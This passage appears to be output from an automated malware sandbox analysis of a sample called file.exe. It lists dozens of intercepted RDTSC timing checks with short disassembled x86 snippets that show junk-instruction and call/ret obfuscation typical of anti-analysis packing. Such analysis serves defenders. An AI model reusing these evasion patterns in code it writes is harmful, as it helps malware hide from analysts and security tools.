                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBA10B second address: FBA10F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB91A0 second address: FB91C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b pushad 0x0000000c js 00007F1F50CBBC36h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB10A second address: FBB17A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov bl, ch 0x0000000b push 00000000h 0x0000000d adc bl, 00000055h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F1F50F77978h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c jmp 00007F1F50F77985h 0x00000031 push eax 0x00000032 pushad 0x00000033 jmp 00007F1F50F7797Fh 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F1F50F77987h 0x0000003f rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBC1D2 second address: FBC211 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F1F50CBBC47h 0x0000000d nop 0x0000000e sbb di, 6EE8h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 mov bl, ah 0x00000019 xchg eax, esi 0x0000001a jmp 00007F1F50CBBC3Dh 0x0000001f push eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBC211 second address: FBC215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB300 second address: FBB304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC0191 second address: FC019B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push esi 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD379 second address: FBD3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1F50CBBC36h 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F1F50CBBC38h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 push dword ptr fs:[00000000h] 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007F1F50CBBC38h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 mov dword ptr fs:[00000000h], esp 0x0000004e cmc 0x0000004f mov eax, dword ptr [ebp+122D0121h] 0x00000055 add bx, D4E8h 0x0000005a push FFFFFFFFh 0x0000005c adc ebx, 321BA434h 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F1F50CBBC40h 0x0000006a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE323 second address: FBE385 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F1F50F77976h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 or edi, dword ptr [ebp+122D33E6h] 0x00000017 push dword ptr fs:[00000000h] 0x0000001e sub ebx, 4C2C5649h 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b xor ebx, dword ptr [ebp+122D363Eh] 0x00000031 mov eax, dword ptr [ebp+122D0015h] 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007F1F50F77978h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000015h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 push FFFFFFFFh 0x00000053 or dword ptr [ebp+122D2650h], ebx 0x00000059 push eax 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e pop eax 0x0000005f rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBC33A second address: FBC33F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBC33F second address: FBC3B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a stc 0x0000000b push dword ptr fs:[00000000h] 0x00000012 mov ebx, 0F427FB9h 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e sub dword ptr [ebp+122D1B5Ch], ebx 0x00000024 mov eax, dword ptr [ebp+122D1731h] 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007F1F50F77978h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 mov dword ptr [ebp+12469831h], ecx 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push edi 0x0000004f call 00007F1F50F77978h 0x00000054 pop edi 0x00000055 mov dword ptr [esp+04h], edi 0x00000059 add dword ptr [esp+04h], 00000014h 0x00000061 inc edi 0x00000062 push edi 0x00000063 ret 0x00000064 pop edi 0x00000065 ret 0x00000066 mov dword ptr [ebp+122D2FCBh], edi 0x0000006c push eax 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 pushad 0x00000071 popad 0x00000072 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBC3B6 second address: FBC3BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2FB8 second address: FC2FCA instructions: 0x00000000 rdtsc 0x00000002 js 00007F1F50F77976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F1F50F7797Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC3225 second address: FC322F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1F50CBBC3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCBDAF second address: FCBDC3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1F50F77978h 0x00000008 js 00007F1F50F7797Eh 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCDC71 second address: FCDC76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCDC76 second address: FCDC84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F1F50F77976h 0x0000000e rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCDC84 second address: FCDC94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD20A9 second address: FD20AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD210C second address: FD2110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD2110 second address: FD211E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F1F50F77976h 0x0000000e rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD211E second address: FD2144 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F1F50CBBC44h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD2144 second address: FD214A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDAB79 second address: FDAB7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDAB7F second address: FDABA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F1F50F77988h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDABA7 second address: FDABAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD9822 second address: FD982F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD982F second address: FD9835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD9835 second address: FD9839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD9839 second address: FD9855 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1F50CBBC36h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007F1F50CBBC38h 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F1F50CBBC36h 0x0000001a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDA02E second address: FDA032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDA032 second address: FDA049 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F1F50CBBC3Dh 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDA049 second address: FDA04D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDA04D second address: FDA053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDA053 second address: FDA07A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b jmp 00007F1F50F77981h 0x00000010 pop ebx 0x00000011 jp 00007F1F50F7797Ah 0x00000017 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDA19B second address: FDA1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push esi 0x00000009 pushad 0x0000000a jmp 00007F1F50CBBC49h 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDA4BA second address: FDA4BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDA61F second address: FDA625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDA625 second address: FDA63F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1F50F77983h 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDA8CD second address: FDA8DC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1F50CBBC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE3003 second address: FE3010 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edx 0x0000000d rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA740E second address: F8C7B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub dword ptr [ebp+122D1A26h], edi 0x00000012 lea eax, dword ptr [ebp+1249C156h] 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F1F50CBBC38h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 push eax 0x00000033 push ecx 0x00000034 jmp 00007F1F50CBBC48h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp], eax 0x0000003d push 00000000h 0x0000003f push ebp 0x00000040 call 00007F1F50CBBC38h 0x00000045 pop ebp 0x00000046 mov dword ptr [esp+04h], ebp 0x0000004a add dword ptr [esp+04h], 00000019h 0x00000052 inc ebp 0x00000053 push ebp 0x00000054 ret 0x00000055 pop ebp 0x00000056 ret 0x00000057 jg 00007F1F50CBBC3Ch 0x0000005d call dword ptr [ebp+122D25E8h] 0x00000063 pushad 0x00000064 jnc 00007F1F50CBBC38h 0x0000006a push ebx 0x0000006b jbe 00007F1F50CBBC36h 0x00000071 pop ebx 0x00000072 push eax 0x00000073 push edx 0x00000074 push edi 0x00000075 pop edi 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA79A6 second address: FA79AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA79AA second address: FA79B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA79B0 second address: FA79B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA79B6 second address: FA79BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA79BA second address: FA79BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA7A9D second address: FA7AA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA7AA1 second address: FA7AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA7AA7 second address: DDE81E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub dword ptr [ebp+122D28B8h], edx 0x00000012 push dword ptr [ebp+122D0435h] 0x00000018 mov di, EE8Ah 0x0000001c call dword ptr [ebp+122D192Ah] 0x00000022 pushad 0x00000023 stc 0x00000024 xor eax, eax 0x00000026 mov dword ptr [ebp+122D19CAh], eax 0x0000002c mov edx, dword ptr [esp+28h] 0x00000030 clc 0x00000031 mov dword ptr [ebp+122D356Eh], eax 0x00000037 jno 00007F1F50CBBC43h 0x0000003d pushad 0x0000003e jmp 00007F1F50CBBC45h 0x00000043 popad 0x00000044 mov esi, 0000003Ch 0x00000049 mov dword ptr [ebp+122D1A77h], ecx 0x0000004f jnl 00007F1F50CBBC37h 0x00000055 add esi, dword ptr [esp+24h] 0x00000059 pushad 0x0000005a mov eax, dword ptr [ebp+122D34DAh] 0x00000060 mov di, 58FBh 0x00000064 popad 0x00000065 lodsw 0x00000067 pushad 0x00000068 jmp 00007F1F50CBBC3Ah 0x0000006d mov cl, ah 0x0000006f popad 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 cmc 0x00000075 mov ebx, dword ptr [esp+24h] 0x00000079 mov dword ptr [ebp+122D19CAh], ebx 0x0000007f pushad 0x00000080 movzx esi, ax 0x00000083 sbb ecx, 16025E9Fh 0x00000089 popad 0x0000008a nop 0x0000008b pushad 0x0000008c jmp 00007F1F50CBBC44h 0x00000091 push eax 0x00000092 push edx 0x00000093 jmp 00007F1F50CBBC44h 0x00000098 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA7E99 second address: FA7E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA7E9D second address: FA7EA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA7EA1 second address: FA7EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA7FF5 second address: FA800A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA88F9 second address: F8D38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jc 00007F1F50F7797Ch 0x0000000b jnl 00007F1F50F77976h 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007F1F50F77988h 0x00000018 nop 0x00000019 ja 00007F1F50F7797Ch 0x0000001f lea eax, dword ptr [ebp+1249C156h] 0x00000025 sub dword ptr [ebp+122D1ACCh], eax 0x0000002b mov dx, 1BADh 0x0000002f nop 0x00000030 push ebx 0x00000031 jmp 00007F1F50F77982h 0x00000036 pop ebx 0x00000037 push eax 0x00000038 jmp 00007F1F50F77983h 0x0000003d nop 0x0000003e call 00007F1F50F77980h 0x00000043 add dx, 257Fh 0x00000048 pop edi 0x00000049 call dword ptr [ebp+122D1959h] 0x0000004f push eax 0x00000050 push esi 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE23D6 second address: FE23DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE23DF second address: FE23FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jp 00007F1F50F77989h 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F1F50F77981h 0x00000012 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE2696 second address: FE26C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F1F50CBBC3Eh 0x0000000c jnp 00007F1F50CBBC36h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop eax 0x00000015 js 00007F1F50CBBC70h 0x0000001b jne 00007F1F50CBBC44h 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE285E second address: FE2868 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1F50F77976h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE2868 second address: FE2871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE2871 second address: FE2878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE2878 second address: FE2890 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F1F50CBBC41h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE2A2B second address: FE2A3F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1F50F77976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b jng 00007F1F50F77988h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8850 second address: FE8856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE78A9 second address: FE78B5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE78B5 second address: FE78B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE7D2A second address: FE7D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE7D2E second address: FE7D40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE7D40 second address: FE7D46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE7D46 second address: FE7D78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC42h 0x00000007 jmp 00007F1F50CBBC42h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8275 second address: FE829C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77981h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1F50F7797Ch 0x0000000e jnl 00007F1F50F77976h 0x00000014 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEBDFB second address: FEBE11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC42h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEBE11 second address: FEBE17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEBE17 second address: FEBE1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEBE1D second address: FEBE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F50F77983h 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEBE34 second address: FEBE50 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c jg 00007F1F50CBBC36h 0x00000012 push eax 0x00000013 pop eax 0x00000014 je 00007F1F50CBBC36h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
